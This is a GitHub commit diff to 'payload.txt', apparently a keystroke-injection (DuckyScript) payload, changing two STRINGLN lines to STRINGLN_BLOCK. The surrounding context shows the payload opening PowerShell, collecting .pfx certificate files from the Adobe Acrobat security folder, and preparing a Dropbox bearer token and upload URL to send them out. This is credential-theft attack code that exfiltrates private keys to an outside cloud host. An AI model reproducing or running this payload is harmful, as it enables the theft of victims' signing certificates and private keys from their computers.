Update payload.txt

pull/175/head
Kalani Helekunihi 2023-06-12 13:56:10 -04:00 committed by GitHub
parent 9a2e80673f
commit 612179f327
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -24,7 +24,7 @@ STRING PowerShell
DELAY 2000
REM Settings about Adobe Reader
STRINGLN
STRINGLN_BLOCK
$roamingFolderPath = [Environment]::GetFolderPath('ApplicationData')
$securityFolderPath = Join-Path -Path $roamingFolderPath -ChildPath 'Adobe\Acrobat\DC\Security'
$pfxFiles = Get-ChildItem -Path $securityFolderPath -Filter '*.pfx' -File
@ -36,7 +36,7 @@ STRING DROPBOX_ACCESS_TOKEN
STRING "
ENTER
STRINGLN
STRINGLN_BLOCK
$authHeader = @{Authorization = "Bearer $accessToken"}
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"